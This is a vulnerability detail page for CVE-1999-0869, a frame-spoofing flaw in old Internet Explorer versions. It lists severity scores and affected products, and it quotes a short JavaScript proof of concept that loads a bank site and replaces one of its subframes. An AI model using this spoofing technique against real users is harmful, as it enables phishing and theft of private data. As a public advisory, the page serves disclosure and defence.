CVE-1999-0869 : Detail

CVE-1999-0869

2.63%V3
Network
2000-01-04
04h00 +00:00
2024-08-01
16h55 +00:00
Notifications for a CVE
Stay informed of any changes for a specific CVE.
Notifications manage

CVE Descriptions

Internet Explorer 3.x to 4.01 allows a remote attacker to insert malicious content into a frame of another web site, aka frame spoofing.

CVE Informations

Metrics

Metrics Score Severity CVSS Vector Source
V2 2.6 AV:N/AC:H/Au:N/C:P/I:N/A:N nvd@nist.gov

EPSS

EPSS is a scoring model that predicts the likelihood of a vulnerability being exploited.

EPSS Score

The EPSS model produces a probability score between 0 and 1 (0 and 100%). The higher the score, the greater the probability that a vulnerability will be exploited.

EPSS Percentile

The percentile is used to rank CVE according to their EPSS score. For example, a CVE in the 95th percentile according to its EPSS score is more likely to be exploited than 95% of other CVE. Thus, the percentile is used to compare the EPSS score of a CVE with that of other CVE.

Exploit information

Exploit Database EDB-ID : 19662

Publication date : 1999-11-29 23h00 +00:00
Author : Georgi Guninski
EDB Verified : Yes

Internet Explorer 4.1 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 5.0 for Windows 95/Windows 98/Windows NT 4,Internet Explorer 4.0.1 for Windows 98/Windows NT 4.0 Subframe Spoofing Vulnerability source: https://www.securityfocus.com/bid/855/info IE's default security settings allow a malicious webpage to open a new browser, open another site's main frame in that new browser and then set any subframes to a URL of their choosing. This could lead to misappropriation of private information, among other problems. <SCRIPT> b=window.open("http://www.citybank.com"); function g() { b.frames[2].location="http://www.yahoo.com"; } setTimeout("g()",6000); </SCRIPT>

Products Mentioned

Configuraton 0

Microsoft>>Internet_explorer >> Version 3.0

Microsoft>>Internet_explorer >> Version 3.0.1

Microsoft>>Internet_explorer >> Version 3.0.2

Microsoft>>Internet_explorer >> Version 3.2

Microsoft>>Internet_explorer >> Version 4.0

Microsoft>>Internet_explorer >> Version 4.0.1

Netscape>>Navigator >> Version *

References